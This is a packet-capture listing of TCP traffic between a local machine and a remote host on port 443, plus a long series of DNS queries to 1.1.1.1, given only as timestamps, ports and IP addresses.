Nov 30, 2024 21:20:08.545008898 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.545012951 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.549380064 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.549607992 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.549613953 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.550767899 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.550813913 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.550817966 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.551691055 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.551731110 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.551737070 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.595590115 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.595654011 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.595659018 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.596537113 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.596581936 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.596585989 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.597567081 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.597610950 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.597615004 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.598716021 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.598759890 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.598764896 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.599562883 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.599608898 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.599613905 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.600646973 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.600714922 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.600719929 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.601656914 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.601701975 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.601706982 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.602644920 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.602689028 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.602694988 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.604465961 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.604511023 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.604516029 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.608110905 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.608155012 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.608160019 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.608963966 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.609006882 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.609011889 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.610302925 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.610347033 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.610352039 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.611258984 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.611329079 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.611332893 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.612245083 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.612292051 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.612297058 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.648852110 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.648895025 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.648899078 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.649367094 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.649411917 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.649418116 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.650183916 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.650227070 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.650234938 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.661250114 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.661304951 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.661309958 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.661771059 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.661815882 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.661819935 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.662777901 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.662822962 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.662827969 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.707418919 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.707470894 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.707475901 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.707762957 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.707806110 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.707811117 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.708648920 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.708694935 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.708699942 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.710535049 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.710577965 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.710583925 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.711527109 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.711574078 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.711579084 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.712502003 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.712547064 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.712552071 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.713648081 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.713692904 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.713697910 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.714615107 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.714656115 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.714660883 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.715627909 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.715672016 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.715676069 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.719465971 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.719511986 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.719516039 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.719552994 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.719553947 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.719597101 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.719636917 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.719647884 CET	443	49732	142.250.181.33	192.168.2.4
Nov 30, 2024 21:20:08.719659090 CET	49732	443	192.168.2.4	142.250.181.33
Nov 30, 2024 21:20:08.719664097 CET	443	49732	142.250.181.33	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 30, 2024 21:19:58.788635015 CET	50913	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:19:58.926681995 CET	53	50913	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:01.868774891 CET	56822	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:02.014686108 CET	53	56822	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:13.051811934 CET	64233	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:13.919034958 CET	53	64233	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:13.921463013 CET	50396	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:14.160275936 CET	53	50396	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:14.165776968 CET	58194	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:14.394790888 CET	53	58194	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:14.399770975 CET	59343	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:14.726340055 CET	53	59343	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:14.729773045 CET	58098	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:14.956677914 CET	53	58098	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:14.960141897 CET	62093	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:15.286494970 CET	53	62093	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:18.373158932 CET	63341	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:18.511601925 CET	53	63341	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:19.524996042 CET	63790	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:19.664045095 CET	53	63790	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:19.664894104 CET	51083	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:19.803625107 CET	53	51083	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:19.811276913 CET	53547	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:19.952616930 CET	53	53547	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:19.953778028 CET	61155	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:20.094705105 CET	53	61155	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:23.181216002 CET	52884	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:23.318753004 CET	53	52884	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:24.356708050 CET	60532	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:24.495557070 CET	53	60532	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:24.496412039 CET	61257	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:24.638061047 CET	53	61257	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:24.638699055 CET	65126	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:24.776655912 CET	53	65126	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:25.968305111 CET	51046	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:26.107414961 CET	53	51046	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:28.927884102 CET	57473	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:29.066092014 CET	53	57473	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:29.066862106 CET	62189	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:29.205302000 CET	53	62189	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:29.206114054 CET	57310	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:29.344206095 CET	53	57310	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:29.344914913 CET	50667	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:29.482296944 CET	53	50667	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:31.508605957 CET	58377	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:31.646773100 CET	53	58377	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:34.742742062 CET	49332	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:34.881442070 CET	53	49332	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:34.883137941 CET	64728	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:35.029947042 CET	53	64728	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:35.031610966 CET	50236	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:35.169544935 CET	53	50236	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:35.170341969 CET	56437	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:35.309427977 CET	53	56437	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:36.414865971 CET	52231	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:36.552264929 CET	53	52231	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:39.597009897 CET	61579	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:39.734575033 CET	53	61579	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:40.739792109 CET	53343	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:40.878406048 CET	53	53343	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:40.879400969 CET	49844	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:41.018325090 CET	53	49844	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:41.037494898 CET	60974	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:41.175610065 CET	53	60974	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:41.207196951 CET	54616	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:41.345863104 CET	53	54616	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:44.380466938 CET	49350	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:44.519197941 CET	53	49350	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:45.534804106 CET	65103	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:45.677118063 CET	53	65103	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:46.690948963 CET	57490	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:46.834093094 CET	53	57490	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:46.866139889 CET	60471	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:47.006577969 CET	53	60471	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:47.011625051 CET	52810	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:47.149168015 CET	53	52810	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:49.175127029 CET	62765	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:49.314065933 CET	53	62765	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:50.331707954 CET	60699	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:50.470022917 CET	53	60699	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:51.472702026 CET	58067	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:51.611023903 CET	53	58067	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:51.612708092 CET	52634	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:51.751804113 CET	53	52634	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:52.775780916 CET	53910	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:52.914022923 CET	53	53910	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:53.925158978 CET	56457	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:54.063324928 CET	53	56457	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:55.079088926 CET	49569	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:55.218070984 CET	53	49569	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:56.191185951 CET	49950	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:56.328525066 CET	53	49950	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:56.331583977 CET	65535	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:56.469964981 CET	53	65535	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:57.410475969 CET	64562	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:57.548737049 CET	53	64562	1.1.1.1	192.168.2.4
Nov 30, 2024 21:20:59.347059011 CET	56725	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:20:59.485255957 CET	53	56725	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:00.359288931 CET	54162	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:00.502027035 CET	53	54162	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:01.336260080 CET	51070	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:01.477688074 CET	53	51070	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:01.481594086 CET	64085	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:01.621457100 CET	53	64085	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:02.425920010 CET	52150	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:02.566562891 CET	53	52150	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:04.086724997 CET	50061	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:04.224761009 CET	53	50061	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:04.956564903 CET	64799	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:05.094913006 CET	53	64799	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:06.472410917 CET	60083	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:06.609518051 CET	53	60083	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:06.610152006 CET	51686	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:06.749284983 CET	53	51686	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:07.395179987 CET	49533	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:07.534893990 CET	53	49533	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:09.362833977 CET	65086	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:09.502218962 CET	53	65086	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:10.081568956 CET	51900	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:10.219013929 CET	53	51900	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:11.300690889 CET	55617	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:11.439683914 CET	53	55617	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:11.440706968 CET	63256	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:11.579838991 CET	53	63256	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:12.097825050 CET	53613	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:12.236726999 CET	53	53613	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:14.143867970 CET	56877	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:14.282865047 CET	53	56877	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:15.144154072 CET	49287	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:15.283533096 CET	53	49287	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:16.081947088 CET	64835	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:16.223004103 CET	53	64835	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:16.223571062 CET	55983	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:16.361119986 CET	53	55983	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:17.114682913 CET	51516	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:17.257592916 CET	53	51516	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:18.940857887 CET	55338	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:19.078742981 CET	53	55338	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:19.957072020 CET	57598	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:20.096915007 CET	53	57598	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:20.911865950 CET	51115	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:21.049371004 CET	53	51115	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:21.060028076 CET	60681	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:21.197849989 CET	53	60681	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:21.925966024 CET	52789	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:22.063519955 CET	53	52789	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:24.051876068 CET	58588	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:24.189595938 CET	53	58588	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:24.958461046 CET	65464	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:25.096009970 CET	53	65464	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:26.003395081 CET	56146	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:26.141227961 CET	53	56146	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:26.142193079 CET	53764	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:26.282574892 CET	53	53764	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:26.914160967 CET	51596	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:27.052870035 CET	53	51596	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:28.894304991 CET	60405	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:29.033406019 CET	53	60405	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:29.909570932 CET	51021	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:30.047322035 CET	53	51021	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:30.894481897 CET	50790	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:31.033432007 CET	53	50790	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:31.042433977 CET	63174	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:31.181201935 CET	53	63174	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:31.894876003 CET	53224	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:32.036652088 CET	53	53224	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:33.894922018 CET	53284	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:34.034883976 CET	53	53284	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:34.894846916 CET	54499	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:35.033586979 CET	53	54499	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:35.895925999 CET	57528	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:36.036237001 CET	53	57528	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:36.037107944 CET	65098	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:36.175532103 CET	53	65098	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:36.899306059 CET	51254	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:37.039459944 CET	53	51254	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:38.894054890 CET	54301	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:39.032274008 CET	53	54301	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:39.894634008 CET	51674	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:40.034517050 CET	53	51674	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:40.893779993 CET	56028	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:41.032161951 CET	53	56028	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:41.032602072 CET	64170	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:41.169986010 CET	53	64170	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:41.897578001 CET	56769	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:42.039813995 CET	53	56769	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:43.893748999 CET	49931	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:44.031375885 CET	53	49931	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:44.893963099 CET	64318	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:45.033250093 CET	53	64318	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:45.894664049 CET	63060	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:46.032500982 CET	53	63060	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:46.033447981 CET	58629	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:46.171067953 CET	53	58629	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:46.893852949 CET	58691	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:47.032495022 CET	53	58691	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:48.895332098 CET	51814	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:49.033123970 CET	53	51814	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:49.894217014 CET	51850	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:50.032078981 CET	53	51850	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:50.893872976 CET	51471	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:51.031549931 CET	53	51471	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:51.032885075 CET	52245	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:51.170728922 CET	53	52245	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:51.893728018 CET	58065	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:52.032042980 CET	53	58065	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:53.899760962 CET	52337	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:54.042223930 CET	53	52337	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:54.894948006 CET	59449	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:55.038091898 CET	53	59449	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:55.976394892 CET	64574	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:56.114653111 CET	53	64574	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:56.174391031 CET	62933	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:56.313155890 CET	53	62933	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:56.894635916 CET	59056	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:57.032442093 CET	53	59056	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:58.894963026 CET	56636	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:21:59.033225060 CET	53	56636	1.1.1.1	192.168.2.4
Nov 30, 2024 21:21:59.894376040 CET	65416	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:00.034631968 CET	53	65416	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:00.894511938 CET	63380	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:01.033250093 CET	53	63380	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:01.033885956 CET	51698	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:01.173715115 CET	53	51698	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:01.894428015 CET	63586	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:02.032789946 CET	53	63586	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:03.896915913 CET	60168	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:04.035186052 CET	53	60168	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:04.894059896 CET	62598	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:05.037240028 CET	53	62598	1.1.1.1	192.168.2.4
Nov 30, 2024 21:22:05.893786907 CET	56631	53	192.168.2.4	1.1.1.1
Nov 30, 2024 21:22:06.032116890 CET	53	56631	1.1.1.1	192.168.2.4
